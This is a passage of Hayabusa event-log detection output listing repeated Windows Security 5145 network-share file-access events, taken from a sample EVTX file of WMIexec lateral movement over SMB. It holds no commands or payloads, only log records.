Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 